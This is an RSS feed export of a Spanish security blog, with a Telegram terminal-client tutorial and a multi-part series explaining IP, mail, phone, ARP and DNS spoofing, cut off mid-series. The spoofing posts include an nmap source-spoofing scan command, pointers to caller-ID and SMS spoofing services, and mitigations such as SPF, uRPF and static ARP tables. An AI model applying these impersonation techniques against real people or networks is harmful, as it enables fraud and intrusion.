<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3202431149232845016</atom:id><lastBuildDate>Thu, 09 Dec 2021 14:20:04 +0000</lastBuildDate><category>Linux</category><category>Noticias</category><category>Android</category><category>Seguridad</category><category>Tutoriales</category><category>Programacion</category><category>Vulnerabilidades</category><category>Hacking</category><category>Herramientas</category><category>Troyanos (RAT)</category><category>Keyloggers</category><title>Kodeinfect's Blog</title><description>GNU/Linux, Android, Malware, Hacking, Vulnerabilidades, Noticias y Mas.</description><link>http://kode-labs.blogspot.com/</link><managingEditor>noreply@blogger.com (Kodeinfect)</managingEditor><generator>Blogger</generator><openSearch:totalResults>337</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>GNU/Linux, Android, Malware, Hacking, Vulnerabilidades, Noticias y Mas.</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-8651343523661896362</guid><pubDate>Sun, 02 Mar 2014 14:46:00 +0000</pubDate><atom:updated>2014-03-02T10:16:56.784-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Linux</category><title>Utilizando Telegram Desde La Terminal</title><description>&lt;div class="post"&gt;&lt;div class="inner" id="msg_71544"&gt;&lt;div align="center"&gt;&lt;img alt="" class="bbc_img resized" height="200" src="https://telegram.org/img/t_logo.png" width="200" /&gt;&lt;/div&gt;&lt;br /&gt;A  estas alturas seguramente mas de uno hayáis oído y/o leído sobre  Telegram, el nuevo sistema de mensajería que rivaliza con el  omnipresente (y poco seguro) Whatsapp. Tambien sabreis que es Software  Libre y que tanto el programa, como su API, son libres (salvo el  servidor, si bien parece que podría también liberarse) En este articulo  explicare los pasos a seguir para instalar y usar el cliente para la  terminal, el cual aun esta en desarrollo, pero que podemos usar sin  muchos problemas.&lt;br /&gt;&lt;br /&gt;Para compilar necesitaremos los siguientes paquetes (aparte de GCC, autotools y demás):&lt;b&gt; · git&lt;br /&gt;· openssl&lt;br /&gt;· lua&lt;br /&gt;· libconfig&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Una vez instaladas las dependencias abrimos una terminal y nos movemos a la carpeta donde clonaremos el repositorio:&lt;/div&gt;&lt;textarea style="height: 18px; width: 599px;"&gt;git clone https://github.com/vysheng/tg.git&lt;/textarea&gt;&lt;br /&gt;&lt;div class="inner" id="msg_71544"&gt;&lt;/div&gt;&lt;div class="inner" id="msg_71544"&gt;&lt;br /&gt;Ahora nos movemos a la carpeta recién creada, tg, y ejecutamos:&lt;br /&gt;&lt;textarea style="height: 34px; width: 600px;"&gt;./configure make&lt;/textarea&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;br /&gt;&lt;/div&gt;Si no ha fallado nada tendremos compilado el programa.&lt;br /&gt;Para probarlo ejecutamos:&lt;br /&gt;&lt;textarea style="height: 21px; width: 600px;"&gt;./telegram&lt;/textarea&gt;&lt;br /&gt;&lt;br /&gt;Nos  saldrá una pantalla como esta pidiéndonos nuestro numero de teléfono  para enviarnos un mensaje con el código de verificación:&lt;br /&gt;&lt;img alt="" class="bbc_img resized" src="http://blog.desdelinux.net/wp-content/uploads/2014/02/telegram-inicio1.png?0edce3" height="311" style="cursor: pointer;" width="600" /&gt;&lt;br /&gt;&lt;br /&gt;Una vez introducido el código ya podremos usar el cliente:&lt;br /&gt;&lt;img alt="" class="bbc_img resized" src="http://blog.desdelinux.net/wp-content/uploads/2014/02/telegram-sesion-iniciada.png?0edce3" height="311" style="cursor: pointer;" width="494" /&gt;&lt;br /&gt;&lt;br /&gt;Ademas tiene autocompletado, tanto de los comandos como de los contactos:&lt;br /&gt;&lt;img alt="" class="bbc_img resized" src="http://blog.desdelinux.net/wp-content/uploads/2014/02/telegram-autocompletado1.png?0edce3" height="311" style="cursor: pointer;" width="494" /&gt;&lt;br /&gt;&lt;br /&gt;Dentro de la carpeta &lt;b&gt;~/.telegram&lt;/b&gt; se guarda la configuración del cliente, ademas de una carpeta donde se  guardaran las imágenes, vídeos, etc que nos manden nuestros contactos  (si bien esto hay que hacerlo a mano a través de un comando).&lt;br /&gt;&lt;br /&gt;Comandos básicos:&lt;br /&gt;· &lt;b&gt;msg&lt;/b&gt;: Mandamos un mensaje a uno de nuestros contactos&lt;br /&gt;· &lt;b&gt;send_photo/video/text&lt;/b&gt;: Mandamos una imagen, vídeo o archivo de texto&lt;br /&gt;· &lt;b&gt;create_secret_chat&lt;/b&gt;: Creamos un chat secreto con el contacto indicado&lt;br /&gt;· &lt;b&gt;add_contact&lt;/b&gt;: Intenta añadir un contacto indicando su telefono&lt;br /&gt;&lt;br /&gt;Estos son algunos de los comando disponibles. Para conocer el resto basta con escribir &lt;i&gt;help&lt;/i&gt;.&lt;br /&gt;&lt;br /&gt;El  cliente, aun en fase temprana, esta bastante bien, si sabes manejarte  con la terminal. El punto negativo de moento es que para bajar lo que  nos envían es necesario hacerlo de manera manual, sabiendo ademas el &lt;i&gt;id&lt;/i&gt; del mensaje. Para esto ejecutamos el comando:&lt;br /&gt;&lt;textarea style="height: 35px; width: 600px;"&gt;set msg_num 1&lt;/textarea&gt;&lt;br /&gt;&lt;div class="codeheader"&gt;&lt;code class="bbc_code"&gt;&lt;/code&gt;&lt;/div&gt;Cada vez que enviemos o recibamos un mensaje nos saldrá el numero ID del mensaje.&lt;br /&gt;&lt;br /&gt;Espero  que os sirva de ayuda, a la espera de que salga algún cliente gráfico  para los que no queráis usar la terminal, o no estáis acostumbrados a  usarla.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a class="bbc_link" href="https://github.com/vysheng/tg" target="_blank"&gt;&lt;b&gt;Repositorio del proyecto&lt;/b&gt;&lt;/a&gt; | &lt;a class="bbc_link" href="http://blog.desdelinux.net/usando-telegram-desde-la-terminal/" target="_blank"&gt;&lt;b&gt;Source: Desdelinux&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://kode-labs.blogspot.com/2014/03/utilizando-telegram-desde-la-terminal.html</link><author>noreply@blogger.com (Kodeinfect)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3202431149232845016.post-2288258672087746099</guid><pubDate>Wed, 15 Jan 2014 13:54:00 +0000</pubDate><atom:updated>2014-01-15T09:24:19.309-04:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Seguridad</category><title>Spoofing: Suplantando Tu Identidad</title><description>&lt;div class="post"&gt;&lt;div class="inner" id="msg_69958"&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (1/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;La suplantación de identidad puede ocurrir mas alla de cuando alguien &lt;em&gt;roba tu documento de identificación personal, &lt;br /&gt;&lt;br /&gt;pasaporte, licencia de conducir&lt;/em&gt;, etc. Con el fin de hacerse pasar por ti, ya sea para robarte, amenazarte, cometer &lt;br /&gt;&lt;br /&gt;algún acto delictivo en tu nombre o cualquier otro tipo de actividad que te pueda afectar de alguna manera.&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="199" src="http://1.bp.blogspot.com/-3grkHqYi16k/UstpkJ5ClZI/AAAAAAAAAe4/lrHCmaTztE8/s1600/Licencia.jpeg" style="cursor: pointer;" width="253" /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;Figura 1: Robando tu identidad&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La suplantación de identidad también puede realizarse a los dispositivos informáticos, pasando desde tu dispositivo de red, &lt;br /&gt;&lt;br /&gt;llegando a tu ordenador y visitando tu teléfono móvil.&lt;em&gt; La suplantación de identidad a dispositivos informáticos se &lt;br /&gt;&lt;br /&gt;denomina spoofing&lt;/em&gt; y consisten en utilizar técnicas que permitan engañar de alguna forma la tecnología, ya sea alterando &lt;br /&gt;&lt;br /&gt;las cabeceras de los paquetes que se envían en la red o saltándose los estándares establecidos para la &lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/wiki/Familia_de_protocolos_de_Internet%22" target="_blank"&gt;familia de protocolos TCP/IP&lt;/a&gt;, entre otras, que &lt;br /&gt;&lt;br /&gt;permitan suplantar la identidad de otro ordenador, una pagina web, un numero telefónico, un correo electrónico o &lt;br /&gt;&lt;br /&gt;ubicaciones GPS.&lt;br /&gt;&lt;br /&gt;Los ataque de spoofing se clasifican en:&lt;br /&gt;&lt;ul class="bbc_list" style="list-style-type: decimal;"&gt;&lt;li&gt;&lt;strong&gt;Ip spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Mail Spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Phone spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;ARP Spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;DNS Spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Web Spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;&lt;strong&gt;GPS Spoofing.&lt;/strong&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;El spoofing aplicado en cualquiera de su clasificación puede ser muy perjudicial, si un atacante decidirá utilizar el spoofing en tu contra, habrían muchas cosas que entrarían en juego, como lo son tu dinero, tus datos personales, tus credenciales a servicios o sistemas, tu ordenador e incluso tu vida. Por ello hay que tomar las precauciones necesarias para evitar caer bajo un ataque de este tipo.&lt;br /&gt;&lt;br /&gt;Un ataque bien elaborado podría dejar al descubierto los sistemas de tu empresa y darle acceso a tus sistemas o servicios a un atacante que pueda valerse de esta técnica de ingeniería social, ya sea pidiéndote tus contraseñad de una manera muy educada o también de una forma poco sutil con el único fin causarte problemas.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (2/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;El spoofing puede tener un impacto muy grande al momento de realizar un ataque y no sea implementando ninguna medida de seguridad que pueda ayudarte a mitigarlo.&lt;br /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 14pt;"&gt;&lt;strong&gt;IP Spoofing&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;em&gt;Este ataque busca suplantar la identidad de otro ordenador con una IP determinada de tal forma que todo el trafico que &lt;br /&gt;&lt;br /&gt;este genere, parezca legitimo de la IP suplantada.&lt;/em&gt; Para efectuar el ataque se deben de generar paquetes IP con una IP de origen falsa.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="296" src="http://3.bp.blogspot.com/-A2fAmHiR7U0/Us1QnQNrqJI/AAAAAAAAAfI/ja3oSC_mWIk/s640/Captura+de+pantalla+de+2014-01-08+07:13:52.png" width="640" /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;em&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;Figura 1: Cabeceras del protocolo IP&lt;/span&gt;&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Para ello se debe alterar la cabecera IP de origen en cada paquete a enviar. Este tipo de ataque puede utilizarse para diversos fines, de &lt;em&gt;realizar algún sondeo a sistemas, ingresar a un sistema en concreto que cuente con un filtrado o corta fuegos y que unicamente permite trafico desde un conjunto de direcciones IP para las cuales existe un relación de confianza&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;Dentro de este ataque entran en juego 3 elementos, una identidad de un ordenador a suplantar, el ordenador atacante y el ordenador a ser atacado. Para establecer la conexión con el objetivo de ataque, se debe cumplir con los 3 pasos denominados &lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/wiki/Transmission_Control_Protocol%22" target="_blank"&gt;three way handshake&lt;/a&gt;. &lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="389" src="http://4.bp.blogspot.com/-wP_wjEshiNc/Us1aVjw4fXI/AAAAAAAAAfY/HPe6MGs9MiI/s640/tcp-3-way-handshake.jpg" width="640" /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;em&gt;&lt;em&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;Figura 2: Establecimiento de conexión (three way handshake).&lt;/span&gt;&lt;/em&gt;&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;Al realizar este ataque se debe asegurar que el ordenador suplantado este desconectado de la red, ya que de lo contrario el ordenador al que se esta suplantando enviaría un paquete de reset al momento de recibir un SYN/ACK, para el cual no ha enviado ningún paquete SYN, y la conexión spoofeada finalizaría. &lt;em&gt;Una solución para evitar que el ordenador, que es victima de suplantación envía un parque de reset, es realizándole un ataque DoS&lt;/em&gt;, y evitar que este pueda realizar alguna respuesta.&lt;br /&gt;&lt;br /&gt;Para realizar un sondeo con nmap y evitar a los corta fuegos utilizaríamos el comando&lt;em&gt;:&lt;/em&gt;&lt;/div&gt;&lt;div class="inner" id="msg_69958"&gt;&lt;em&gt;&amp;nbsp;&lt;/em&gt;&lt;/div&gt;&lt;div class="inner" id="msg_69958"&gt;&lt;em&gt;nmap -e Interface -S direccion_falsa Host_Objetivo&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="334" src="http://3.bp.blogspot.com/-01ysl2Z6rh4/Us1gqQq0q_I/AAAAAAAAAfo/m5ntQnFhE1c/s640/Captura+de+pantalla+de+2014-01-08+08:21:04.png" width="640" /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;&lt;em&gt;Figura 3: Opciones de nmap de spoofing.&lt;/em&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Ademas de nmap tienes otro conjunto de herramientas con las que puedes hacer este tipo de ataque como &lt;a class="bbc_link" href="http://%22http//www.hping.org/%22" target="_blank"&gt;hping&lt;/a&gt;, para identificar corta fuegos, puertos y demás que permiten de una forma sencilla efectuar una suplantación de IP sin mayor problema.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span class="bbc_size" style="font-size: 14pt;"&gt;Contramedidas&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Para evitar caer bajo este tipo de ataque puedes apoyarte en diversas soluciones tecnológicas que te permitirán mitigar estos ataques de una forma muy eficaz y eficiente. Al utilizar &lt;em&gt;Cisco IOS&lt;/em&gt;, tienes la opción de poder implementar &lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/wiki/Lista_de_control_de_acceso%22" target="_blank"&gt;listas de control de acceso (ACL)&lt;/a&gt;&amp;nbsp; negado todo el trafico de &lt;a class="bbc_link" href="http://%22http//www.ietf.org/rfc/rfc1918.txt%22" target="_blank"&gt;direcciones privadas&lt;/a&gt; no confiables (127.0.0.0/8,192.168.0.0/16,169.254.0.0./16,etc)&amp;nbsp; para ello es necesario filtrar estas direcciones para descartar todo el&amp;nbsp; trafico que provengan desde internet suplantando dichas direcciones.&lt;/div&gt;&lt;div class="inner" id="msg_69958"&gt;&amp;nbsp;&lt;/div&gt;&lt;div class="inner" id="msg_69958"&gt;La utilización de reverse path &lt;a class="bbc_link" href="http://%22http//www.cisco.com/web/about/security/intelligence/unicast-rpf.html%E2%80%8E%22" target="_blank"&gt;forwarding o IP verify&lt;/a&gt;, es otra manera de proteger la red ante este tipo de ataque, el proceso que sucede en este caso, es recibir el paquete y obtener la IP de origen, se realiza un lookup para determinar si el router contiene una ruta su tabla de enrutamiento que permita establecer una respuesta para dicho paquete, si no existe un ruta que permita una respuesta hacia la IP de origen se considera que es un IP spoofing y se descarta dicho paquete.&lt;br /&gt;&lt;br /&gt;También puedes implementar &lt;em&gt;rp_filter&lt;/em&gt;, el cual comprueba que todos los paquetes que ingresan por una interfaz se pueden alcanzar por la misma, basándose en la dirección de origen.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (3/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Aunque el IP spoofing puede ser un problema al no ser controlado, tambien un atacante puede tirar de el mail spoofing para poder perpetrar algun tipo de ataque. La explicacion de este ataque es mas que obvia, pues el atacante busca suplantar tu identidad por medio de un correo electronico, es decir, suplantar tu cuenta de correo electronico. El ataque se realiza en el nivel de aplicacion del &lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/?title=Modelo_TCP/IP%22" target="_blank"&gt;modelo TCP/IP,&lt;/a&gt; realizado en el protocolo SMTP bajo el puerto TCP 25, el ataque tiene efecto ya que no hay ningun mecanimos de autenticacion cuando se realiza la conexion a dicho puerto.&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="191" src="http://2.bp.blogspot.com/-Hqj5IkmJAqs/Us6trGQipEI/AAAAAAAAAf4/rVM8GTjEU60/s1600/Mail+Spoofing.png" style="cursor: pointer;" width="263" /&gt;&lt;br /&gt;Figura 1: Esquema del funcionamiento SMTP&lt;br /&gt;&lt;br /&gt;Cuando se envia un correo electrónico por medio del protocolo SMTP, la conexión inicial estable dos cabeceras MAIL FROM, en donde se establece, tanto el destinatario como la ruta de respuesta y RCPT TO, aca se debe de especificar a quien se enviara el correo electrónico o destinatario, posteriormente a esto se envía el comando DATA, para ello se envian algunas cabeceras, dentro de ellas From (por ejemplo usuario &lt;a class="bbc_email" href="mailto:usuario@correo.com"&gt;usuario@correo.com&lt;/a&gt;) y Reply-to (por ejemplo usuario 1 &lt;a class="bbc_email" href="mailto:usuario1@correo.com"&gt;usuario1@correo.com&lt;/a&gt;). Esto lleva a que el destinatario visualizara el correo como proveniente de FROM, aunque en muchas ocasiones puede verificarse la procedencia si se encuentra incluido el MAIL FROM.Aunque hay varias formas de poder mitigar la suplantación de identidad por medio del correo electrónico, aun esta una tarea ardua para toda empresa. Una de las formas que se han implementado en los ultimos años es el &lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/wiki/Sender_Policy_Framework%22" target="_blank"&gt;Sender Policy Framework,&lt;/a&gt; quien se encarga de comprobar los ordenadores autorizados para enviar un correo electrónico bajo un dominio determinado, es decir, establecer una relación de ordenador/IP, por medio de registros spf, esta configuración tendrá que desarrollarla el responsable del dominio.&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="333" src="http://1.bp.blogspot.com/-MfUTLoYjPG0/Us7Fh0T9JnI/AAAAAAAAAgI/Hsh1Anurxog/s1600/BI.png" style="cursor: pointer;" width="683" /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;&lt;em&gt;Figura 2: Politica SPF para Banco Industrial Guatemala.&lt;/em&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Un ejemplo del implementación de SPF, es la que realiza el banco Industrial de Guatemala, analizando el registro veremos los siguiente, v=spf1, lo cual indica que la versión del SPF, mx:bi.com.gt, establece la autorización a los ordenadores con&amp;nbsp; la ip 4:168.234.207.16 y -all indica que no autorice a las maquinas que no cumplen con dicha especificación. Al tratar de hacer un ataque, intentado suplantar una cuenta de correo electrónico del banco, este es el resultado.&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="416" src="http://2.bp.blogspot.com/-o3YJ7R5sh_0/Us7VzuE1eMI/AAAAAAAAAgY/RSz9E8I0PRc/s1600/MS.png" style="cursor: pointer;" width="960" /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;&lt;/span&gt;&lt;div align="center"&gt;&lt;em&gt;Figura 3: El ataque ha sido mitigado﻿ por hotmail.&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;El ataque lo efectúe a mi cuenta de hotmail, y como se puede ver, el ataque fue mitigado muy bien, enviado el correo a correo no deseado y mostrando una alerta.&lt;br /&gt;&amp;nbsp; &lt;br /&gt;Al efectúa el mismo ataque contra un dominio que no tenga especificado el SPF, para mitigar este tipo de ataque el resultado sera el siguiente:&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="327" src="http://3.bp.blogspot.com/-uyfQWdO-Tsw/Us7W96kqBwI/AAAAAAAAAgk/_3MhixFIgVQ/s1600/nospf.png" style="cursor: pointer;" width="676" /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;&lt;/span&gt;&lt;div align="center"&gt;&lt;em&gt;Figura 4: Carencia de implentacion de SPF.&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="354" src="http://2.bp.blogspot.com/-9Ww6v2uQ8R4/Us7YLJciKiI/AAAAAAAAAgw/WRxx1HfBMVE/s1600/MM.png" style="cursor: pointer;" width="960" /&gt;&lt;br /&gt;&lt;div align="center"&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;&lt;em&gt;Figura 5: El correo a llegado a la bandeja sin ninguna alerta.&lt;/em&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Sin el SPF, mitigar el ataque es algo casi imposible, ya que no hay forma de establecer que ordenadores estarán autorizados para utilizar tu dominio, tambien es posible utilizar SenderID, que te protegerá o mitigara estos ataques.. Adicional a esto se implementa el estándar &lt;a class="bbc_link" href="http://%22http//www.dkim.org/%22" target="_blank"&gt;DKIM&lt;/a&gt;, para darle un mayor refuerzo a la seguridad y evitar que estos ataques se perpetren. La finalidad de este tipo de ataques puede ser variada, desde difundir spam, enviar malware utilizando tu nombre de dominio, para brindar mayor confianza a quien se ataca, etc. Asi que, si aun no tienes configurado ninguna protección en tus servidores de correo, ya es hora de que eches mano en ello.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (4/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Aunque la suplantación de identidad por mail o por IP, suele ser muy tentador, puede que un atacante quiera ir mas allá y hacer un ataque mas atrevido, como puede ser un ataque de phone spoofing. Bajo esta técnica se puede utilizar tanto el SMS spoofing, como el Caller ID spoofing y hacerse pasar por alguien mas, como lo puede ser tu jefe o el administrador de sistemas de tu empresa. Definitivamente para realizar este ataque, el atacante debe conocer bien el listado de números telefónicos de la empresa y trata dialogar con alguna persona importante dentro de la empresa, a fin de captar su tonalidad de voz. Esto me hace recordar que durante un curso en la Universidad, llegue a imitar la voz del catedrático de dicho curso, con el fin de bromear con los amigos después de un tiempo era sumamente difícil notar la diferencia entre su tonalidad y la mía. Un ataque de igual forma podría tomarse el tiempo para afinar sus cuerdas vocales y posteriormente elaborar un buen ataque de ingeniería social.&amp;nbsp; Por supuesto, estos ataques van mas allá del entorno empresarial, pues podría utilizarse para hacer phishing por medio del móvil, solicitando números de seguro social, datos de tarjetas de crédito y demás o peor aun, si alguien quiere hacerte daño, bastaría con comunicarse contigo, haciéndose pasar por alguien a quien tu le tengas confianza y citarte en un lugar, al cual seguramente asistirías.&lt;br /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 14pt;"&gt;&lt;strong&gt;Caller ID Spoofing&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Para realizar una llamada con un identificador falso hay múltiples opciones, desde &lt;a class="bbc_link" href="http://%22http//www.spooftel.com/%22" target="_blank"&gt;sitios web&lt;/a&gt;, donde en algunos de los casos te dejan probar un trial del servicio, y después pagas por el, otros completamente de pago y otros completamente gratuitos, pero con restricciones hacia algunos países.También puedes hacerlo con &lt;em&gt;metasploit&lt;/em&gt; y &lt;a class="bbc_link" href="http://%22http//sflphone.org/%22" target="_blank"&gt;SIP&lt;/a&gt; |&lt;a class="bbc_link" href="http://%22http//www.youtube.com/watch?v=GkdyQVh36qc%22" target="_blank"&gt; Hacer una llamada con suplantación del identificador o numero de teléfono desde kali linux&lt;/a&gt;, también puedes hacerlo con tu Iphone, para mayor comodidad, aunque tendrás que disponer de unos cuantos dolares para contratar el servicio.&lt;a class="bbc_link" href="http://%22https//www.youtube.com/watch?v=oIAL9GL4RZk%22" target="_blank"&gt; Suplantando el identificador de llamada o numero de teléfono desde&amp;nbsp; Iphone con spoof card&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 14pt;"&gt;&lt;strong&gt;SMS Spoofing&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Para realizar este ataque, de igual forma puedes valerte de servicios gratuitos o de pago que hay en la red, te dejo uno por si quieres hacer la prueba &lt;a class="bbc_link" href="http://%22http//www.fakemsg.com/test_system.php%22" target="_blank"&gt;fakemsg.com&lt;/a&gt;, también puedes utilizar algunas aplicaciones para smartphones. O si lo prefieres hacerlo desde &lt;em&gt;SET&lt;/em&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a class="bbc_link" href="http://%22http//www.youtube.com/watch?v=XBv8HtLEmAs%22" target="_blank"&gt; Enviando un sms suplantando un numero de teléfono&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ahora ya sabes que no debes de fiarte de las llamadas o mensajes que te puedan llegar al móvil, si un día recibes un sms sospechoso, donde el administrador te pide, tus credenciales del sistema, para verificar algún evento del sistema, o algún amigo o familiar te pide algo por alguna llamada telefónica, cerciorarte de que es verdaderamente esa persona la que te lo esta solicitando, porque puede que este siendo victima de un ataque de phone spoofing.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (5/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Un ataque muchos mas conocido y practicado de suplantación de identidad a un dispositivo es ARP Spoofing. ARP (&lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/wiki/Address_Resolution_Protocol%22" target="_blank"&gt;Address Resolution Protocol&lt;/a&gt;) es un protocolo que se encarga de asociar un dispositivo IP, que a nivel lógico esta identificado por una dirección IP, a un dispositivo de red, que a nivel físico, posee una dirección física de red y que es usado usualmente en entornos de redes locales o Ethernet. En cada ordenador se establece una tabla ARP que almacenan direcciones físicas y lógicas de cada dispositivo dentro de la red local. Cuando el ordenador intenta enviar algún tipo de paquete a otro ordenador en tu red, debes de conocer tanto la dirección física(MAC), como su dirección lógica(IP), para ello debe de consultarse la tabla ARP.&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="331" src="http://4.bp.blogspot.com/-3Pi0yxxC7f8/UtFGBObEhRI/AAAAAAAAAhA/n-H97RoK38A/s1600/Cabeceras.png" style="cursor: pointer;" width="672" /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;em&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;Figura 1: Cabeceras del protocolo ARP.&lt;/span&gt;&lt;/em&gt;&lt;/div&gt;&lt;br /&gt;Existen diversas cabeceras en el protocolo ARP, pero las mas importantes al momento de realizar un ataque de ARP Spoofing son el Target Hardware Address que es la dirección física o MAC del ordenador destino y Target Network Address la cual es la dirección lógica o IP del ordenador destino. Para este ataque, se realiza el envió de mensajes ARP a la Ethernet, la finalidad del ataque puede ser asociar la dirección física o MAC del atacante con la dirección lógica o IP de la victima.&amp;nbsp;&lt;/div&gt;&lt;div class="inner" id="msg_69958"&gt;Por ejemplo, este ataque podría ir dirigido al Gateway, entonces todo el trafico será enviado al atacante y será este quien decida si enviarlo a la puerta de enlace o no, y por supuesto, podrá analizar detalladamente todo lo que sucede en la red. &lt;br /&gt;&lt;br /&gt;Aunque hay varios ataques que pueden efectuares como MAC Flooding y ataques de denegación de servicio, un ataque que sin duda es mucho mas peligroso es el Man in the Middle (MITM).&lt;br /&gt;&lt;br /&gt;&lt;img alt="" class="bbc_img resized" height="167" src="http://4.bp.blogspot.com/-bNqyh1fBefY/UtFLZRZqo5I/AAAAAAAAAhQ/3IzjwKMXY3g/s1600/imagesCAZDR33E.jpg" style="cursor: pointer;" width="301" /&gt;&lt;br /&gt;&lt;span class="bbc_size" style="font-size: 10pt;"&gt;&lt;em&gt;Figura 2: Esquema de un ataque MITM&lt;/em&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Acá tienes un video muy completo de como realizar un ataque MITM, el video fue realizado en la DEFCON 20.&lt;br /&gt;&lt;br /&gt;&lt;a class="bbc_link" href="http://%22https//www.youtube.com/watch?v=9JB9d-HoO_8%22" target="_blank"&gt;Video Main In The Middle DEFCON 20 &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Por supuesto tienes a tu merced muchas mas herramientas que puedes utilizar al momento de realizar un ataque MITM. La mayoría de sistemas anti malware detectan este tipo de ataques y los bloquean, aunque nunca esta demás dejar tablas ARP estáticas o utilizar un software como MARMITA que te ayuden a mitigar este tipo de ataques.&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;strong&gt;Spoofing, suplantando tu identidad (6/8)&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Otro ataque que se suele usar es DNS Spoofing, como ya sabes, el &lt;a class="bbc_link" href="http://%22http//es.wikipedia.org/wiki/Domain_Name_System%22" target="_blank"&gt;DNS&lt;/a&gt; es un sistema de 